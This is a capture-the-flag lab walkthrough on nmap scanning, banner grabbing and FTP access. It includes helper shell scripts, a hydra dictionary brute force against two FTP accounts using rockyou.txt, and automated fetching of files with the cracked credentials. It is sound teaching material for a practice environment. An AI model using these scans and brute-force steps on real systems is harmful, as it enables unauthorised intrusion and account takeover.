Task 1
Start the attack machine and the target machine.
[Optional] Export the target IP as an environment variable so you do not have to retype it:
root@ip-10-10-245-205:~# export ip="10.10.36.158"
root@ip-10-10-245-205:~# echo $ip
10.10.36.158
Task 2
The first three questions can be answered with one nmap scan:
» What is the highest port number being open less than 10,000?
» There is an open port outside the common 1000 ports; it is above 10,000. What is it?
» How many TCP ports are open?
nmap -p- -T5 $ip
  -p-   scan all 65535 TCP ports instead of nmap's default top 1000
  -T5   "insane" timing template: fastest and loudest; on a laggy link it can drop responses, so rerun with -T4 if a port you expect is missing
  $ip   the target IP declared in Task 1
Result
Host is up (0.00048s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
xx/tcp open ssh
xx/tcp open http
xxx/tcp open netbios-ssn
xxx/tcp open microsoft-ds
xxxx/tcp open http-proxy
xxxxx/tcp open unknown
You can now answer the first three questions.
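Rather than reading the three answers off the listing by eye, the following shell script (an added example, not part of the original writeup) parses nmap's normal output and computes them. The scan listing embedded in it is a constructed sample, not the target's real result; its port numbers are illustrative only.

```shell
#!/bin/sh
# Constructed sample of `nmap -p- -T5 $ip` normal output. This is NOT the
# target's real result; the port numbers below are illustrative only.
SAMPLE_NMAP='Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.36.158
Host is up (0.00048s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
5000/tcp  open  upnp
8080/tcp  open  http-proxy
10021/tcp open  unknown'

# Open TCP port numbers from normal-format nmap output, ascending, one per line.
# Only "NNN/tcp open ..." lines count; closed and filtered ports are ignored.
open_ports() {  # usage: open_ports "<nmap output>"
  printf '%s\n' "$1" |
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" { sub(/\/tcp$/, "", $1); print $1 }' |
    sort -n
}

# Question 3: how many TCP ports are open?
count_open() {  # usage: count_open "<nmap output>"
  open_ports "$1" | wc -l | tr -d ' '
}

# Question 1: highest open port strictly below LIMIT (10000 in the room).
highest_below() {  # usage: highest_below "<nmap output>" LIMIT
  open_ports "$1" | awk -v lim="$2" '($1 + 0 < lim + 0) { m = $1 } END { print m }'
}

# Question 2: open ports strictly above LIMIT, the ones a default top-1000 scan misses.
above() {  # usage: above "<nmap output>" LIMIT
  open_ports "$1" | awk -v lim="$2" '($1 + 0 > lim + 0)'
}

# Against the live target, save the scan with -oN and feed the file back in:
#   nmap -p- -T5 -oN full.txt "$ip"; highest_below "$(cat full.txt)" 10000
echo "open TCP ports:  $(count_open "$SAMPLE_NMAP")"
echo "highest < 10000: $(highest_below "$SAMPLE_NMAP" 10000)"
echo "above 10000:     $(above "$SAMPLE_NMAP" 10000)"
```

The functions only trust lines whose state column says open, so a port nmap reports as filtered (common when -T5 drops a reply) is not counted; if the count looks low, rerun the scan at -T4 before trusting the answer.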
» What is the flag hidden in the HTTP server header?
There are multiple ways to get the HTTP header flag.
Using curl
curl -I $ip
  -I / --head   send a HEAD request and print only the response headers
Result
# curl -I $ip
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "229449419"
Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
Content-Length: 226
Date: Sat, 10 Feb 2024 14:54:59 GMT
Server: lighttpd xxx{xxxxxxxxxxxx}
Side note: not relevant for this lab, but add -L to the command if the target answers with a 301 or 302 redirect; curl then follows it and prints the headers of every hop.
Using nmap
nmap -p 80 -A $ip
  -p 80   scan only port 80 (web server)
  -A      aggressive mode: OS detection, version detection (-sV), the default NSE scripts (-sC) and traceroute; the http-server-header script is what prints the Server header in the output below
Result
[...]
PORT STATE SERVICE VERSION
80/tcp open http lighttpd
|_http-server-header: lighttpd xxx{xxxxxxxxxxxx}
|_http-title: Hello, world!
MAC Address: 02:C3:78:16:23:15 (Unknown)
[...]
Using your browser
- Open the browser and load the target IP (the homepage)
- Open the browser dev tools and go to the Network tab
- Refresh the page without cache (Ctrl+Shift+R)
- Click the 200 response for the root directory /
- Check the Response Headers section for the flag: lighttpd xxx{xxxxxxxxxxxx}
» What is the flag hidden in the SSH server header?
Using the ssh client
ssh -v whatever@$ip
  -v             verbose output, which prints the server's identification string (the banner) during the handshake
  whatever@$ip   any username will do: the banner is exchanged before authentication, so just Ctrl+C at the password prompt
Result
[...]
debug1: match: OpenSSH_8.2p1 xxx{xxxxxxxxxxxx} pat OpenSSH* compat 0x04000000
[...]
Using nmap
nmap -p 22 -A $ip
  -p 22   scan only port 22 (ssh daemon)
  -A      aggressive mode: OS detection, version detection (-sV), default NSE scripts and traceroute; the banner shows up in the fingerprint-strings output of version detection
Result
[...]
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-OpenSSH_8.2p1 xxx{xxxxxxxxxxxx}
[...]
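For both banners the interesting text is a field in a well-defined protocol string, and you do not need curl, ssh or nmap to fetch it. The bash script below is an added example, not part of the original writeup: it grabs the HTTP headers and the SSH identification string over bash's /dev/tcp (useful on a foothold box with no tooling) and extracts the Server header value and the SSH comments field, which is where RFC 4253 puts everything after the first space. The sample responses inside it are constructed; the flag text in them is a placeholder, not the lab's flag.

```shell
#!/bin/bash
# Added example: grab both banners with nothing but bash's /dev/tcp and pull the
# interesting field out of each. The samples below are constructed, not the
# target's real responses.
CR=$(printf '\r')
SAMPLE_HTTP="HTTP/1.1 200 OK${CR}
Content-Type: text/html${CR}
Server: lighttpd sample{constructed-not-a-flag}${CR}
Content-Length: 226${CR}
${CR}"
SAMPLE_SSH="SSH-2.0-OpenSSH_8.2p1 sample{constructed-not-a-flag}${CR}"

# Value of one response header; names compare case-insensitively, CRs are stripped.
header_value() {  # usage: header_value NAME "<raw response>"
  printf '%s\n' "$2" | awk -v name="$1" '
    BEGIN { name = tolower(name) ":" }
    { line = $0; sub(/\r$/, "", line) }
    tolower($1) == name { sub(/^[^:]*:[ \t]*/, "", line); print line; exit }'
}

# RFC 4253 section 4.2: the identification string is
#   SSH-protoversion-softwareversion SP comments CR LF
# so everything after the first space is the free-form comments field; that is
# where this lab's flag sits. Returns 1 if there is no comments field.
ssh_comments() {  # usage: ssh_comments "<identification line>"
  id=${1%"$CR"}
  case $id in
    SSH-*' '*) printf '%s\n' "${id#* }" ;;
    *) return 1 ;;
  esac
}

# The softwareversion token, e.g. OpenSSH_8.2p1.
ssh_software() {  # usage: ssh_software "<identification line>"
  id=${1%"$CR"}
  id=${id%% *}                    # drop the comments field
  printf '%s\n' "${id#SSH-*-}"    # drop the "SSH-2.0-" prefix
}

# Live grabs (bash only: /dev/tcp and read -t). The SSH server speaks first, so one
# line is enough; HTTP needs a request, and HTTP/1.0 makes the server close after
# answering so cat reads to EOF.
grab_ssh_banner() {  # usage: grab_ssh_banner HOST [PORT]
  exec 3<>"/dev/tcp/$1/${2:-22}" || return 1
  IFS= read -r -t 5 line <&3
  exec 3>&-
  printf '%s\n' "$line"
}

grab_http_headers() {  # usage: grab_http_headers HOST [PORT]
  exec 3<>"/dev/tcp/$1/${2:-80}" || return 1
  printf 'HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1" >&3
  cat <&3
  exec 3>&-
}

main() {  # usage: main HOST
  banner=$(grab_ssh_banner "$1" 22)
  echo "HTTP Server header: $(header_value Server "$(grab_http_headers "$1" 80)")"
  echo "SSH software:       $(ssh_software "$banner")"
  echo "SSH comments:       $(ssh_comments "$banner")"
}

# Run against the lab target when a host is given (or $ip from Task 1 is set).
if [ -n "${1:-${ip:-}}" ]; then main "${1:-$ip}"; fi
```

Because the SSH comments field is free-form and sent before any authentication, anything an administrator (or a CTF author) puts there is visible to every client that connects; the same goes for the HTTP Server header, which is why both are routinely trimmed on hardened hosts.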
» We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
The first nmap scan identified every service except one: the port above 10000, which it could only list as unknown. To find out what runs there, use nmap again with version detection:
nmap -A -p 10021 $ip
Result
PORT STATE SERVICE VERSION
10021/tcp open ftp xxxxx x.x.x
[...]
The scan identifies a common FTP server and its version, which is the answer.
» We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
To solve this, we need access to the FTP server. We will brute force the two accounts with hydra and the rockyou.txt password list.
Step 1: If you are not sure where rockyou.txt is, find it with locate:
# locate rockyou.txt
/usr/share/wordlists/rockyou.txt
Step 2: Create a new file usernames.txt containing quinn and eddie, one name per line. Use your favourite editor, or:
printf '%s\n' eddie quinn > usernames.txt
  printf            similar to echo, but with consistent behaviour across shells
  '%s\n'            the format is applied once per argument, so each name ends up on its own line
  eddie quinn       the user names we were given
  > usernames.txt   write the output to a file
Side note: you can skip this step if you only want to try one user name (pass it to hydra with -l eddie instead of -L usernames.txt).
Step 3: Use hydra to brute force FTP access for both usernames
hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt ftp://$ip:10021
Result
[...]
[DATA] attacking ftp://10.10.36.158:10021/
[10021][ftp] host: 10.10.36.158 login: quinn password: ******
[10021][ftp] host: 10.10.36.158 login: eddie password: *****
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-02-10 15:57:04
Success!
Step 4: Log into the FTP server with the recovered credentials and retrieve the flag file.
ftp $ip 10021
Enter the username and password when prompted, then check with ls whether the flag file is there:
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1002 1002 18 Sep 20 2021 ftp_flag.txt
226 Directory send OK.
Now use get ftp_flag.txt to download the file to the attack machine:
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (7.7403 kB/s)
Use exit to disconnect from the FTP server, then show the content of the flag file:
cat ftp_flag.txt
xxx{xxxxxxxxxxxx}
Done.
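Steps 2 to 4 can also be done without an interactive ftp session. The shell script below is an added example, not part of the original writeup: it writes the username file, parses hydra's result lines into user:password pairs and fetches each account's ftp_flag.txt with curl over FTP. The hydra output inside it is a constructed sample, since the writeup masks the real passwords; run_lab and ftp_fetch need the lab network and are not exercised offline.

```shell
#!/bin/sh
# Added example: the Step 2-4 workflow without an interactive ftp session.
# hydra's result lines are parsed into user:password pairs and each account's
# ftp_flag.txt is fetched with curl over FTP. The hydra output below is a
# constructed sample: the writeup masks the real passwords.
SAMPLE_HYDRA='[DATA] attacking ftp://10.10.36.158:10021/
[10021][ftp] host: 10.10.36.158   login: quinn   password: sample-pass-one
[10021][ftp] host: 10.10.36.158   login: eddie   password: sample pass two
1 of 1 target successfully completed, 2 valid passwords found'

# Step 2 without the awkward quoting: one name per line.
write_usernames() {  # usage: write_usernames FILE NAME...
  file=$1; shift
  printf '%s\n' "$@" > "$file"
}

# Turn hydra's "[port][service] host: H   login: U   password: P" lines into "U:P".
# Passwords may contain spaces, so everything after "password: " is kept as-is.
hydra_creds() {  # usage: hydra_creds "<hydra output>"
  printf '%s\n' "$1" | awk '
    /^\[[0-9]+\]\[[a-z]+\] host: / {
      u = $0; sub(/.*login: +/, "", u); sub(/ +password: .*/, "", u)
      p = $0; sub(/.*password: /, "", p)
      print u ":" p
    }'
}

# Step 4 non-interactively: curl speaks FTP natively and defaults to passive mode,
# which sidesteps the "Consider using PASV" hint the server printed above.
ftp_fetch() {  # usage: ftp_fetch HOST PORT USER PASS REMOTE_FILE
  curl -sS --fail --user "$3:$4" "ftp://$1:$2/$5"
}

# End to end against the lab (needs network; not run in the offline check):
# hydra -> credentials -> curl. -t 4 keeps hydra's parallelism modest on a small VM.
run_lab() {  # usage: run_lab HOST PORT
  write_usernames usernames.txt eddie quinn
  out=$(hydra -t 4 -L usernames.txt -P /usr/share/wordlists/rockyou.txt "ftp://$1:$2")
  hydra_creds "$out" | while IFS=: read -r user pass; do
    echo "== $user =="
    ftp_fetch "$1" "$2" "$user" "$pass" ftp_flag.txt
  done
}
```

Call run_lab "$ip" 10021 on the attack box; it prints each account's flag file after hydra finishes. The credentials end up in a shell variable rather than a file, which matters on a shared attack box: the page's interactive approach leaves nothing behind either, but hydra's -o option would.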
» Browsing to http://10.10.36.158:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
This flag is a bit unusual: there is nothing on the page to check or scan for. The page counts the packets it receives and only reacts to a specific scan; the ordinary scans used above do not trigger it. The answer is an nmap TCP Null scan (-sN), which sends TCP probes with no flags set. Like every raw-packet scan it needs root, which the attack box shell already is.
- Open the page on port 8080
- Reset the packet count with the button
- Start nmap -sN $ip (a TCP Null scan)
- The flag will show on the page
Exercise Complete! Task answer: xxx{xxxxxxxxxxxx}
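To see what -sN actually puts on the wire, and what a counter like the one on port 8080 would have to look for, here is an added example (not part of the original writeup) that decodes a TCP flags byte, maps it to the nmap scan type that produces it, and gives the matching tcpdump filter for the defender's side.

```shell
#!/bin/sh
# Added example. A TCP Null scan (nmap -sN) sends segments whose flags byte
# (tcp[13], which tcpdump calls tcp[tcpflags]) is 0. Per RFC 793 a closed port
# answers such a segment with RST and an open port ignores it, so nmap reports
# no reply as open|filtered; stacks that RST everything (Windows, many Cisco
# devices) make every port look closed to -sN, -sF and -sX alike.

# Decode a flags byte (decimal or 0x hex) into flag names, low bit first.
tcp_flag_names() {  # usage: tcp_flag_names 0x29   -> "FIN PSH URG"
  f=$(( $1 )); names=
  [ $(( f & 1 ))   -ne 0 ] && names="$names FIN"
  [ $(( f & 2 ))   -ne 0 ] && names="$names SYN"
  [ $(( f & 4 ))   -ne 0 ] && names="$names RST"
  [ $(( f & 8 ))   -ne 0 ] && names="$names PSH"
  [ $(( f & 16 ))  -ne 0 ] && names="$names ACK"
  [ $(( f & 32 ))  -ne 0 ] && names="$names URG"
  [ $(( f & 64 ))  -ne 0 ] && names="$names ECE"
  [ $(( f & 128 )) -ne 0 ] && names="$names CWR"
  printf '%s\n' "${names# }"
}

# nmap probe type whose segments carry exactly these flags.
scan_type() {  # usage: scan_type 0x00 -> NULL
  case "$(tcp_flag_names "$1")" in
    '')            echo NULL ;;   # -sN: no flags at all
    'FIN')         echo FIN ;;    # -sF
    'FIN PSH URG') echo XMAS ;;   # -sX: "lit up like a Christmas tree"
    'SYN')         echo SYN ;;    # -sS (also the first packet of -sT)
    'ACK')         echo ACK ;;    # -sA
    *)             echo OTHER ;;
  esac
}

# tcpdump/BPF filter that catches the probes of a scan type on the target side.
tcpdump_filter() {  # usage: tcpdump -ni eth0 "$(tcpdump_filter NULL)"
  case $1 in
    NULL) echo 'tcp[tcpflags] == 0' ;;
    FIN)  echo 'tcp[tcpflags] == tcp-fin' ;;
    XMAS) echo 'tcp[tcpflags] == (tcp-fin|tcp-push|tcp-urg)' ;;
    *)    return 1 ;;
  esac
}

for b in 0x00 0x01 0x02 0x29 0x12; do
  echo "$b -> [$(tcp_flag_names "$b")] -> $(scan_type "$b")"
done
```

Running tcpdump with the NULL filter on a box you control while you launch nmap -sN against it shows one flagless segment per probed port and the RST that a closed port sends back; that pair of packets is the whole signature an IDS rule or a packet counter such as this challenge needs.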